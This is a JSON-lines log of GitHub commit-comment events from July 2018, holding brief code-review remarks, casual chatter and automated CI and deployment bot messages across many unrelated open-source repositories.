{"id":"7924252575","type":"CommitCommentEvent","actor":{"login":"DarkPhoenix10"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29609090,"position":null,"line":null,"path":null,"commit_id":"348222c54f3d643e013184e07b02d8957d446a02","created_at":"2018-07-05T16:19:17Z","updated_at":"2018-07-05T16:19:17Z","author_association":"MEMBER","body":"josh stop communicating with reactions on the messages too"}},"created_at":"2018-07-05T16:19:17Z"}
{"id":"7924254020","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29609097,"position":4,"line":764,"path":"src/version.c","commit_id":"856905bd838fdf71be2c3dabc98453b85b80a83b","created_at":"2018-07-05T16:19:33Z","updated_at":"2018-07-05T16:19:33Z","author_association":"NONE","body":"End"}},"created_at":"2018-07-05T16:19:33Z"}
{"id":"7924256858","type":"CommitCommentEvent","actor":{"login":"bartemanuel"},"repo":{"name":"bartemanuel/sample-cloud-native-toolchain-tutorial-20180703182720004"},"payload":{"comment":{"id":29609104,"position":null,"line":null,"path":null,"commit_id":"cdb38caa7da4b30508be0fc9afa7ffc301787112","created_at":"2018-07-05T16:20:07Z","updated_at":"2018-07-05T16:20:07Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/7632eb0c-c808-469e-8e43-a942346cee8d?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180703182720004\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/39741228-5022-4e53-8552-d6d9e814fb93?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180703182720004\") deployed [sample-cloud-native-toolchain-tutorial-20180703182720004](https://github.com/bartemanuel/sample-cloud-native-toolchain-tutorial-20180703182720004/releases/tag/deploy-ibm-yp-us-south-emanuelb-us.ibm.com-prod-20180705-162007 \"deploy-ibm-yp-us-south-emanuelb-us.ibm.com-prod-20180705-162007\") to [prod](https://console.bluemix.net/apps/9a63ea96-b930-475f-bd87-15932b75a917?env_id=ibm:yp:us-south \"ibm:yp:us-south:emanuelb@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-05T16:20:07Z"}
{"id":"7924262383","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29609122,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-05T16:21:08Z","updated_at":"2018-07-05T16:21:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T16:21:08Z"}
{"id":"7924262482","type":"CommitCommentEvent","actor":{"login":"DarkPhoenix10"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29609123,"position":null,"line":null,"path":null,"commit_id":"348222c54f3d643e013184e07b02d8957d446a02","created_at":"2018-07-05T16:21:09Z","updated_at":"2018-07-05T16:21:09Z","author_association":"MEMBER","body":"yes"}},"created_at":"2018-07-05T16:21:09Z"}
{"id":"7924266155","type":"CommitCommentEvent","actor":{"login":"DarkPhoenix10"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29609133,"position":null,"line":null,"path":null,"commit_id":"348222c54f3d643e013184e07b02d8957d446a02","created_at":"2018-07-05T16:21:49Z","updated_at":"2018-07-05T16:21:49Z","author_association":"MEMBER","body":"joshypls"}},"created_at":"2018-07-05T16:21:49Z"}
{"id":"7924270725","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/slycot-feedstock"},"payload":{"comment":{"id":29609148,"position":null,"line":null,"path":null,"commit_id":"d5e4d2f7de077bb802dad77ce8957cf405cd4023","created_at":"2018-07-05T16:22:44Z","updated_at":"2018-07-05T16:22:44Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @murrayrm were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @murrayrm were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T16:22:44Z"}
{"id":"7924277685","type":"CommitCommentEvent","actor":{"login":"112RX221"},"repo":{"name":"112RX221/my-blog.-html-and-css"},"payload":{"comment":{"id":29609167,"position":null,"line":null,"path":null,"commit_id":"cbf3a892052085a45fee8839e57b795df0b16fe0","created_at":"2018-07-05T16:24:03Z","updated_at":"2018-07-05T16:24:03Z","author_association":"OWNER","body":"gg "}},"created_at":"2018-07-05T16:24:03Z"}
{"id":"7924277840","type":"CommitCommentEvent","actor":{"login":"mow-chow"},"repo":{"name":"submit50/USERNAME"},"payload":{"comment":{"id":29609169,"position":1,"line":1,"path":"README.md","commit_id":"2fff6b0898e4af161145a35162bb967ad67a6be4","created_at":"2018-07-05T16:24:05Z","updated_at":"2018-07-05T16:24:05Z","author_association":"NONE","body":"cat"}},"created_at":"2018-07-05T16:24:05Z"}
{"id":"7924278521","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29609175,"position":null,"line":null,"path":null,"commit_id":"f63d8dfc6fe96826f751fd09c1ba4bab5b1ab56c","created_at":"2018-07-05T16:24:13Z","updated_at":"2018-07-05T16:24:13Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-720](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-720).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-720-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T16:24:13Z"}
{"id":"7924281698","type":"CommitCommentEvent","actor":{"login":"DarkPhoenix10"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29609183,"position":null,"line":null,"path":null,"commit_id":"348222c54f3d643e013184e07b02d8957d446a02","created_at":"2018-07-05T16:24:50Z","updated_at":"2018-07-05T16:24:50Z","author_association":"MEMBER","body":"~~josh if you continue i'll block your permission to send reactions in the commits channel~~"}},"created_at":"2018-07-05T16:24:50Z"}
{"id":"7924300012","type":"CommitCommentEvent","actor":{"login":"vova07"},"repo":{"name":"Rebilly/RebillyUserAPI"},"payload":{"comment":{"id":29609246,"position":6,"line":6,"path":"spec/definitions/Templates/Rendering.yaml","commit_id":"444934e59a4de9f2a97bbe4900a3514a79463693","created_at":"2018-07-05T16:28:26Z","updated_at":"2018-07-05T16:28:26Z","author_association":"MEMBER","body":"This one is a definition for one specific template.\r\nBut the endpoint itself can return an array of such objects:\r\nPlease see this line: https://github.com/Rebilly/RebillyUserAPI/commit/444934e59a4de9f2a97bbe4900a3514a79463693#diff-bbfec8e4f15ee0343fd49428b38c5449R40"}},"created_at":"2018-07-05T16:28:26Z"}
{"id":"7924301036","type":"CommitCommentEvent","actor":{"login":"daniel-j-h"},"repo":{"name":"jjmata/robosat"},"payload":{"comment":{"id":29609248,"position":6,"line":43,"path":"robosat/tools/serve.py","commit_id":"d4936f10a741454377e04887ec6249e25c740902","created_at":"2018-07-05T16:28:39Z","updated_at":"2018-07-05T16:28:39Z","author_association":"NONE","body":"This looks wrong"}},"created_at":"2018-07-05T16:28:39Z"}
{"id":"7924301079","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"coccinelle/coccinelle"},"payload":{"comment":{"id":29609249,"position":5,"line":5,"path":"globals/config.ml.in","commit_id":"c619caf856d8a5d05595554aa0f404cd399eee14","created_at":"2018-07-05T16:28:40Z","updated_at":"2018-07-05T16:28:40Z","author_association":"CONTRIBUTOR","body":"I find that the return value can be inappropriate [according to the POSIX specification for such a programming interface](http://pubs.opengroup.org/onlinepubs/9699919799/functions/realpath.html \"Description for the usage of realpath()\").\r\n\r\n…\r\n**DESCRIPTION**\r\n       The _realpath_() function shall derive, from the pathname pointed to by _file_name_, an absolute pathname that resolves to the same directory entry, whose resolution does not involve '.', …\r\n…\r\n\r\n\r\nHow do you think about to split the (initial) case distinction for further data processing?"}},"created_at":"2018-07-05T16:28:40Z"}
{"id":"7924301160","type":"CommitCommentEvent","actor":{"login":"WinnerSong"},"repo":{"name":"WinnerSong/dockerLnmp"},"payload":{"comment":{"id":29609250,"position":2,"line":2,"path":"nginx/Dockerfile","commit_id":"911f9a28b0caee358f344a78a2b783b3a545c43b","created_at":"2018-07-05T16:28:41Z","updated_at":"2018-07-05T16:28:41Z","author_association":"OWNER","body":"点赞"}},"created_at":"2018-07-05T16:28:41Z"}
{"id":"7924304601","type":"CommitCommentEvent","actor":{"login":"daniel-j-h"},"repo":{"name":"jjmata/robosat"},"payload":{"comment":{"id":29609261,"position":15,"line":109,"path":"robosat/tools/serve.py","commit_id":"d4936f10a741454377e04887ec6249e25c740902","created_at":"2018-07-05T16:29:24Z","updated_at":"2018-07-05T16:29:24Z","author_association":"NONE","body":"Hm yeah seems like you are right. Probably came in during some refactoring? Can you fix this and make a pull request please."}},"created_at":"2018-07-05T16:29:24Z"}
{"id":"7924308271","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29609266,"position":null,"line":null,"path":null,"commit_id":"d59151a267365e0af9a4dffd0499867db0d9be61","created_at":"2018-07-05T16:30:09Z","updated_at":"2018-07-05T16:30:09Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#jul-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#jul-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://jul-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-05T16:30:09Z"}
{"id":"7924308356","type":"CommitCommentEvent","actor":{"login":"llikdowk"},"repo":{"name":"llikdowk/llikdowk"},"payload":{"comment":{"id":29609267,"position":null,"line":null,"path":null,"commit_id":"078a10347d1421b8ae47a181dea0c26c6c634c01","created_at":"2018-07-05T16:30:11Z","updated_at":"2018-07-05T16:30:11Z","author_association":"OWNER","body":"delete cname"}},"created_at":"2018-07-05T16:30:11Z"}
{"id":"7924314174","type":"CommitCommentEvent","actor":{"login":"greyson-signal"},"repo":{"name":"signalapp/Signal-Android"},"payload":{"comment":{"id":29609284,"position":null,"line":null,"path":null,"commit_id":"a50edc3d25df871c89fd03b1beb12dea9db663f9","created_at":"2018-07-05T16:31:17Z","updated_at":"2018-07-05T16:31:17Z","author_association":"CONTRIBUTOR","body":"@wizardofid Thanks for calling this out! That was an oversight. I've addressed this in de72466552c5414760ab3453f8a61f2a2089a7be."}},"created_at":"2018-07-05T16:31:17Z"}
{"id":"7924317311","type":"CommitCommentEvent","actor":{"login":"romainhild"},"repo":{"name":"feelpp/book.hifimagnet"},"payload":{"comment":{"id":29609297,"position":null,"line":null,"path":null,"commit_id":"f8a5a9b46c28ca14e7daa253d6aae481ad79bbe8","created_at":"2018-07-05T16:31:56Z","updated_at":"2018-07-05T16:31:56Z","author_association":"COLLABORATOR","body":"@prudhomm I have an error with this: \r\n```\r\nerror: Specified start page for site not found: stable@docs::index.adoc\r\n```\r\nreverting this commit fixed it."}},"created_at":"2018-07-05T16:31:56Z"}
{"id":"7924326006","type":"CommitCommentEvent","actor":{"login":"realityking"},"repo":{"name":"sass/node-sass"},"payload":{"comment":{"id":29609328,"position":5,"line":71,"path":"package.json","commit_id":"ef713a7f4b4c02e05a16b37f4a2ed1d5a535900e","created_at":"2018-07-05T16:33:41Z","updated_at":"2018-07-05T16:33:41Z","author_association":"NONE","body":"Did you intentionally not use the caret operator here?"}},"created_at":"2018-07-05T16:33:41Z"}
{"id":"7924332217","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29609348,"position":null,"line":null,"path":null,"commit_id":"159808d236296bffeb5924fea3f36edde2ce67b6","created_at":"2018-07-05T16:35:03Z","updated_at":"2018-07-05T16:35:03Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-44](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-44).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-44-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-05T16:35:03Z"}
{"id":"7924333932","type":"CommitCommentEvent","actor":{"login":"elektron-bbs"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29609353,"position":null,"line":null,"path":null,"commit_id":"5b24ee8334d09ec08594b2a238b6138a005e2086","created_at":"2018-07-05T16:35:23Z","updated_at":"2018-07-05T16:35:23Z","author_association":"NONE","body":"Bitte mal nichts überstürzen, so wie es jetzt aufgebaut ist, hängt das Programm reproduzierbar in einer Endlosschleife, wenn unplausible Daten mit einem MU-String länger als 242 Zeichen übergeben werden. HomeAutoUser wird sicher später dazu noch genauere Hinweise liefern."}},"created_at":"2018-07-05T16:35:23Z"}
{"id":"7924340424","type":"CommitCommentEvent","actor":{"login":"Chentul"},"repo":{"name":"Chentul/backendninja"},"payload":{"comment":{"id":29609369,"position":7,"line":7,"path":"backendninja/src/main/java/com/udemy/backendninja/controller/HelloWorldController.java","commit_id":"d476aecf30b899a93f506f6f5b15c36b2c65b705","created_at":"2018-07-05T16:36:40Z","updated_at":"2018-07-05T16:36:40Z","author_association":"OWNER","body":"Marcamos @Controller para que spring la mande los beans de tipo controller"}},"created_at":"2018-07-05T16:36:40Z"}
{"id":"7924346545","type":"CommitCommentEvent","actor":{"login":"rdallman"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29609390,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-05T16:37:57Z","updated_at":"2018-07-05T16:37:57Z","author_association":"MEMBER","body":"is there a use case for having what here would be an `fn.yaml` file that only has trigger definitions (or perhaps a separate `triggers.yaml` file)? say for a function a user has permission to invoke but not upload the code for, but they want to create various triggers on it. this could be easily added later from what's here, too, I think."}},"created_at":"2018-07-05T16:37:57Z"}
{"id":"7924352777","type":"CommitCommentEvent","actor":{"login":"sbaik2"},"repo":{"name":"Rezar/ODBot"},"payload":{"comment":{"id":29609410,"position":null,"line":null,"path":null,"commit_id":"d288e18c32b5d0c00fa20bf02a016b90c4b347b1","created_at":"2018-07-05T16:39:14Z","updated_at":"2018-07-05T16:39:14Z","author_association":"COLLABORATOR","body":"Some important changes that were made include:\r\n\r\n- Added __init__ to classes that were missing them.\r\n\r\n- Replaced the name of the variable \"type\", a built-in function name, to \"typ\" (Functions still refer to them as type and should not be significantly important in the api\r\n\r\n- Changed ResponseType.get_type to use dictionary (hash map of some sort) instance of a long line of if-elif statements\r\n"}},"created_at":"2018-07-05T16:39:14Z"}
{"id":"7924354455","type":"CommitCommentEvent","actor":{"login":"WilixLead"},"repo":{"name":"WilixLead/learn.todo"},"payload":{"comment":{"id":29609419,"position":5,"line":4,"path":"server/db.js","commit_id":"d5d8cc7a99f23e61cb778b9b9c2a15890d9785ca","created_at":"2018-07-05T16:39:35Z","updated_at":"2018-07-05T16:39:35Z","author_association":"OWNER","body":"Неверные отступы"}},"created_at":"2018-07-05T16:39:35Z"}
{"id":"7924355172","type":"CommitCommentEvent","actor":{"login":"WilixLead"},"repo":{"name":"WilixLead/learn.todo"},"payload":{"comment":{"id":29609424,"position":6,"line":5,"path":"server/db.js","commit_id":"d5d8cc7a99f23e61cb778b9b9c2a15890d9785ca","created_at":"2018-07-05T16:39:44Z","updated_at":"2018-07-05T16:39:44Z","author_association":"OWNER","body":"после than() надо вызывать .catch()"}},"created_at":"2018-07-05T16:39:44Z"}
{"id":"7924356081","type":"CommitCommentEvent","actor":{"login":"adamaltman"},"repo":{"name":"Rebilly/RebillyUserAPI"},"payload":{"comment":{"id":29609430,"position":6,"line":6,"path":"spec/definitions/Templates/Rendering.yaml","commit_id":"444934e59a4de9f2a97bbe4900a3514a79463693","created_at":"2018-07-05T16:39:57Z","updated_at":"2018-07-05T16:39:57Z","author_association":"MEMBER","body":"Excellent.  Thanks for clarifying."}},"created_at":"2018-07-05T16:39:57Z"}
{"id":"7924359159","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29609438,"position":null,"line":null,"path":null,"commit_id":"d7ac5474dd0582be35e2290d95f5fe610aee2963","created_at":"2018-07-05T16:40:36Z","updated_at":"2018-07-05T16:40:36Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/6/display/redirect) (on internal Jenkins) failed in stage 'Publish builds to GitHub' 🔥 : java.lang.Exception: Skipping the rest for now\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/6//console)\n"}},"created_at":"2018-07-05T16:40:36Z"}
{"id":"7924359486","type":"CommitCommentEvent","actor":{"login":"SteveMoto"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29609440,"position":null,"line":null,"path":null,"commit_id":"7d780a729102f0244c6a43bf68c381be87f22166","created_at":"2018-07-05T16:40:41Z","updated_at":"2018-07-05T16:40:41Z","author_association":"CONTRIBUTOR","body":"Hi Tomas,\r\n\r\nmy test-machine (with minimal-/default-Python + pyserial + python-tk):\r\nsteve@..... ~ $ python\r\nPython 2.7.12 (default, Dec  4 2017, 14:50:18) \r\n[GCC 5.4.0 2016....] on linux2\r\n>>> import numpy\r\nTraceback (most recent call last):\r\n  File \"<stdin>\", line 1, in <module>\r\nImportError: No module named numpy\r\n\r\n\r\ndifference.py:\r\n - from numpy import deg2rad -> imported but unused ?\r\n\r\ntrochoidal.py:\r\n - from numpy import deg2rad\r\n   - def trochoid(self, segment, step, radius, cw=True):\r\n     - d = self.pol2car(radius, phi+deg2rad(90*u), c)\r\n     - ij = self.pol2car(radius, phi+deg2rad(-90*u))\r\n\r\n\r\nanother idea (as with serial interface):\r\n- bCNC.py:\r\n  - line 2545-2553:\r\n\t  if serial is None:\r\n\t\ttkMessageBox.showerror(_(\"python serial missing\"),\r\n\t\t\t_(\"ERROR: Please install the python pyserial module\\n\" \\\r\n\t\t\t  \"Windows:\\n\\tC:\\\\PythonXX\\\\Scripts\\\\easy_install pyserial\\n\" \\\r\n\t\t\t  \"Mac:\\tpip install pyserial\\n\" \\\r\n\t\t\t  \"Linux:\\tsudo apt-get install python-serial\\n\" \\\r\n\t\t\t  \"\\tor yum install python-serial\\n\" \\\r\n\t\t\t  \"\\tor dnf install python-pyserial\"),\r\n\t\t\t  parent=application)\r\n\r\nGreetz\r\nSteve"}},"created_at":"2018-07-05T16:40:41Z"}
{"id":"7924367067","type":"CommitCommentEvent","actor":{"login":"decarlof"},"repo":{"name":"data-exchange/dxfile"},"payload":{"comment":{"id":29609469,"position":null,"line":null,"path":null,"commit_id":"d435de08e9f6c44c68c212827c91eb6c70096e10","created_at":"2018-07-05T16:42:19Z","updated_at":"2018-07-05T16:42:19Z","author_association":"COLLABORATOR","body":"@xianghuix please update the Dynamic layout file with the current. There was a typo  (see above)"}},"created_at":"2018-07-05T16:42:19Z"}
{"id":"7924373915","type":"CommitCommentEvent","actor":{"login":"snake575"},"repo":{"name":"delta575/trading-api-wrappers"},"payload":{"comment":{"id":29609490,"position":null,"line":null,"path":null,"commit_id":"4ce67f1a976b39995a0d77bc5c9feff91694f122","created_at":"2018-07-05T16:43:44Z","updated_at":"2018-07-05T16:43:44Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Agregar paginacion de depositos y retiros a trading-api-wrappers](https://trello.com/c/5pCC26xp/72-agregar-paginacion-de-depositos-y-retiros-a-trading-api-wrappers)"}},"created_at":"2018-07-05T16:43:44Z"}
{"id":"7924376713","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29609494,"position":null,"line":null,"path":null,"commit_id":"07829ff78b5e0ae3a41bc03b338028b3ea541b45","created_at":"2018-07-05T16:44:20Z","updated_at":"2018-07-05T16:44:20Z","author_association":"CONTRIBUTOR","body":"He already changed the other expressions to use `[(all [[of] the]|the)]`."}},"created_at":"2018-07-05T16:44:20Z"}
{"id":"7924378285","type":"CommitCommentEvent","actor":{"login":"unshavedman"},"repo":{"name":"UnshavedGuys/Work"},"payload":{"comment":{"id":29609499,"position":null,"line":null,"path":null,"commit_id":"1b7cdb0229476c8cfeab2017249b19f917e3273a","created_at":"2018-07-05T16:44:41Z","updated_at":"2018-07-05T16:44:41Z","author_association":"NONE","body":"https://docs.microsoft.com/en-us/dotnet/framework/windows-services/walkthrough-creating-a-windows-service-application-in-the-component-designer"}},"created_at":"2018-07-05T16:44:41Z"}
{"id":"7924382162","type":"CommitCommentEvent","actor":{"login":"Kinnari-Sharma"},"repo":{"name":"zesu00/hello-world"},"payload":{"comment":{"id":29609517,"position":null,"line":null,"path":null,"commit_id":"237a0fed74c989156ece63973edf1c1b2bf4cbad","created_at":"2018-07-05T16:45:31Z","updated_at":"2018-07-05T16:45:31Z","author_association":"NONE","body":"Really?"}},"created_at":"2018-07-05T16:45:31Z"}
{"id":"7924383205","type":"CommitCommentEvent","actor":{"login":"cindyloo"},"repo":{"name":"mitmedialab/MediaCloud-Web-Tools"},"payload":{"comment":{"id":29609522,"position":7,"line":22,"path":"server/templates/index.html","commit_id":"18b6b06a993886ab06874f4d6a0aa37678607592","created_at":"2018-07-05T16:45:45Z","updated_at":"2018-07-05T16:45:45Z","author_association":"COLLABORATOR","body":"let's have this be the version number\r\n"}},"created_at":"2018-07-05T16:45:45Z"}
{"id":"7924385085","type":"CommitCommentEvent","actor":{"login":"cindyloo"},"repo":{"name":"mitmedialab/MediaCloud-Web-Tools"},"payload":{"comment":{"id":29609527,"position":13,"line":31,"path":"src/store.js","commit_id":"a442cf16825fe09080993d0e219c4d1fc2ef9d71","created_at":"2018-07-05T16:46:11Z","updated_at":"2018-07-05T16:46:11Z","author_association":"COLLABORATOR","body":"maybe want this info and more"}},"created_at":"2018-07-05T16:46:11Z"}
{"id":"7924388090","type":"CommitCommentEvent","actor":{"login":"erikquinn"},"repo":{"name":"openscope/openscope"},"payload":{"comment":{"id":29609533,"position":15,"line":600,"path":"src/assets/scripts/client/aircraft/AircraftModel.js","commit_id":"2a09c386fa0c4453a51eeb6d966b360c2a90de31","created_at":"2018-07-05T16:46:49Z","updated_at":"2018-07-05T16:46:49Z","author_association":"MEMBER","body":"Add `isArrivalOrOverflight()` for this"}},"created_at":"2018-07-05T16:46:49Z"}
{"id":"7924394416","type":"CommitCommentEvent","actor":{"login":"igoose1"},"repo":{"name":"pravdakotchestno/Tapper-s-formula"},"payload":{"comment":{"id":29609551,"position":null,"line":null,"path":null,"commit_id":"1e3d7e7c2f493d1c01099cc608d3d8dfda115ab5","created_at":"2018-07-05T16:48:14Z","updated_at":"2018-07-05T16:48:14Z","author_association":"NONE","body":"Для обработки аргументов я бы порекомендовал использовать библиотеку argparse.\r\nВ ней не нужно прописывать эти if и try.\r\n\r\nМожете посмотреть пример использования в [моем форке](https://github.com/igoose1/Tapper-s-formula), а именно в [этих строках](https://github.com/igoose1/Tapper-s-formula/blob/6493500163453a617fb8a0c149c96007d8be1e3d/tapper.py#L72)."}},"created_at":"2018-07-05T16:48:14Z"}
{"id":"7924395722","type":"CommitCommentEvent","actor":{"login":"taras96"},"repo":{"name":"antonkryvko/Front-End-Checklist"},"payload":{"comment":{"id":29609556,"position":null,"line":null,"path":null,"commit_id":"a2e4d3dc61c67bcac681ac38d866317eac36a326","created_at":"2018-07-05T16:48:31Z","updated_at":"2018-07-05T16:48:31Z","author_association":"NONE","body":"пропоную створити fork від оригінального репозиторію https://github.com/thedaviddias/Front-End-Checklist і перенести туди цей readme.\r\nЯ б міг сам це зробити, але нехочу \"красти\" вашу роботу.\r\nпотім додам декілька виправлень до файлу.\r\nДякую за виконану роботу!"}},"created_at":"2018-07-05T16:48:31Z"}
{"id":"7924397633","type":"CommitCommentEvent","actor":{"login":"pmcphilwalsh"},"repo":{"name":"pmcphilwalsh/myweb"},"payload":{"comment":{"id":29609560,"position":1,"line":1,"path":"lipsum.txt","commit_id":"6484ad01c0d8e4b6bd4370ceb637116a6a191315","created_at":"2018-07-05T16:48:56Z","updated_at":"2018-07-05T16:48:56Z","author_association":"OWNER","body":"we needed this"}},"created_at":"2018-07-05T16:48:56Z"}
{"id":"7924398626","type":"CommitCommentEvent","actor":{"login":"Harshada9437"},"repo":{"name":"carufus/bbq-campaign"},"payload":{"comment":{"id":29609563,"position":78,"line":102,"path":"src/main/java/com/campaign/api/CustomerService.java","commit_id":"95bba48a96ab3c7bbce231b3f49c1ac5eb7ea5b8","created_at":"2018-07-05T16:49:09Z","updated_at":"2018-07-05T16:49:09Z","author_association":"NONE","body":"it won't return null in any case as  we are sending empty string from dao if we don't get the expected token value"}},"created_at":"2018-07-05T16:49:09Z"}
{"id":"7924399494","type":"CommitCommentEvent","actor":{"login":"pmcphilwalsh"},"repo":{"name":"pmcphilwalsh/myweb"},"payload":{"comment":{"id":29609565,"position":4,"line":4,"path":"lipsum.txt","commit_id":"6484ad01c0d8e4b6bd4370ceb637116a6a191315","created_at":"2018-07-05T16:49:19Z","updated_at":"2018-07-05T16:49:19Z","author_association":"OWNER","body":"## white space"}},"created_at":"2018-07-05T16:49:19Z"}
{"id":"7924404736","type":"CommitCommentEvent","actor":{"login":"danielweck"},"repo":{"name":"readium/readium-shared-js"},"payload":{"comment":{"id":29609574,"position":5,"line":63,"path":"package.json","commit_id":"4646d8fd78e4dd73c84997e466e1163a4054590f","created_at":"2018-07-05T16:50:28Z","updated_at":"2018-07-05T16:50:28Z","author_association":"MEMBER","body":"Done: https://github.com/readium/readium-shared-js/commit/ee0c291875f6076601cabf1307c13fa1af9e8925"}},"created_at":"2018-07-05T16:50:28Z"}
{"id":"7924405346","type":"CommitCommentEvent","actor":{"login":"lgoldstein"},"repo":{"name":"apache/mina-sshd"},"payload":{"comment":{"id":29609575,"position":null,"line":null,"path":null,"commit_id":"f2a60cd07ed17325a64f6a4e806273f81f131f2e","created_at":"2018-07-05T16:50:35Z","updated_at":"2018-07-05T16:50:35Z","author_association":"CONTRIBUTOR","body":"In general I am fine with the code - I will merge it in soon (kind of busy at the moment) - probably within 3-4 days..."}},"created_at":"2018-07-05T16:50:35Z"}
{"id":"7924406171","type":"CommitCommentEvent","actor":{"login":"yutin1987"},"repo":{"name":"sdparty/sdparty-website"},"payload":{"comment":{"id":29609576,"position":null,"line":null,"path":null,"commit_id":"7c94c1e985d17097787e8f93dc5ee05ac7f16494","created_at":"2018-07-05T16:50:45Z","updated_at":"2018-07-05T16:50:45Z","author_association":"COLLABORATOR","body":"👍 "}},"created_at":"2018-07-05T16:50:45Z"}
{"id":"7924407802","type":"CommitCommentEvent","actor":{"login":"lisakowen"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":29609579,"position":12,"line":4864,"path":"gpdb-doc/dita/ref_guide/config_params/guc-list.xml","commit_id":"5c7bad60cd37303da5a5ab39cffa624e27105751","created_at":"2018-07-05T16:51:08Z","updated_at":"2018-07-05T16:51:08Z","author_association":"CONTRIBUTOR","body":"i am confused by the \"enable the enforcement of resource group limits\".  when resource groups are enabled (gp_resource_manager='group'), limits are enforced.  in the specific case where you want to bypass the concurrency limit, (hence the use of the term \"bypass\" in the GUC name), you can set this config parameter in your session.   what about something like:  \"The default value is false, Greenplum Database enforces the concurrency limit.\""}},"created_at":"2018-07-05T16:51:08Z"}
{"id":"7924409433","type":"CommitCommentEvent","actor":{"login":"hasanira28"},"repo":{"name":"hasanira28/marsteam.github.io"},"payload":{"comment":{"id":29609587,"position":null,"line":null,"path":null,"commit_id":"4bf87672002237a65aa84e0209e59c220cb9691c","created_at":"2018-07-05T16:51:28Z","updated_at":"2018-07-05T16:51:28Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-05T16:51:28Z"}
